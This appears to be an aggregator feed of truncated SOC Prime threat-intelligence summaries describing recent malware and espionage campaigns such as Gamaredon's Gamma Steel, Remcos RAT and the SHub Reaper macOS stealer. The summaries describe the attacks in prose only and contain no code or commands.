1+ day, 1+ hour ago  (751+ words) SOC Prime SOC Prime Bias: Critical Gamma Steel: Inside Gamaredon's Unfolding Malware Chain The report describes Gamma Steel, a new Gamaredon ( UAC-0010 ) intrusion chain built around a fileless Power Shell stealer. The malware stores 71 encrypted functions in the HKCU\Printers…...

5+ day, 5+ hour ago  (352+ words) SOC Prime SOC Prime Bias: Medium The Demon Arrives Later: A Havoc Stager Hides Behind Microsoft Defender DLP Threat actors in Brazil are distributing spoofed electronic invoice NF-e ZIP attachments that deliver a malicious MSI installer. The MSI drops a…...

1+ week, 1+ hour ago  (401+ words) SOC Prime SOC Prime Bias: Medium Donut Loader Reloaded in a Modern Remcos RAT Campaign G DATA has identified a fresh Remcos RAT campaign that begins with a malicious batch file and moves through several scripting layers, including Power Shell,…...

1+ week, 1+ hour ago  (388+ words) SOC Prime SOC Prime Bias: Critical Operation XENOFISCAL: Side Copy Deploys Persistent Xeno RAT Against Afghanistan's Ministry of Finance The report outlines a spear-phishing operation in which a malicious LNK file triggers mshta. exe to download and execute a remote…...

1+ week, 1+ hour ago  (748+ words) SOC Prime SOC Prime Bias: Critical Operation Dragon Weave Uses Azure Cloud C2 to Target Czech Republic and Taiwan A targeted espionage operation tracked as Operation Dragon Weave uses malicious LNK shortcut files together with a Rust-based executable to launch a…...

2+ week, 4+ day ago  (346+ words) SOC Prime SOC Prime Bias: Critical NG0002 Targets Chinese Academia with Weaponized Institutional Lures A threat actor tracked as UNG0002 launched a spear-phishing campaign against Chinese universities using a malicious ZIP archive disguised as an official fitness testing notice. Inside the archive…...

2+ week, 5+ day ago  (317+ words) SOC Prime SOC Prime Bias: Medium SHub Reaper | mac OS Stealer Spoofs Apple, Google, and Microsoft in a Single Attack Chain The report analyzes a new mac OS infostealer variant called SHub Reaper, which uses fake We Chat and Miro…...

3+ week, 1+ day ago  (400+ words) SOC Prime SOC Prime Bias: Medium Pure Logs Delivered Through Paws Runner Steganography The campaign relies on a phishing email carrying a TXZ archive that delivers a Java Script loader, which sets environment variables and launches conhost. exe in headless…...

1+ mon, 2+ day ago  (293+ words) SOC Prime SOC Prime Bias: Critical Iranian-Nexus Attack Exposes 26, 000 Citizen Records in Oman A state-aligned Iranian threat actor compromised multiple government ministries in Oman by using webshells, Proxy Shell exploits, and a custom command-and-control environment hosted on a UAE-based VPS....

1+ mon, 4+ day ago  (460+ words) SOC Prime SOC Prime Bias: Critical Business search APT & Targeted Attacks Inside Shadow-Earth-053: A China-Aligned Cyberespionage Campaign Against Government and Defense Sectors in Asia A China-aligned threat cluster tracked as SHADOW-EARTH-053 has been exploiting unpatched Microsoft Exchange and IIS servers…...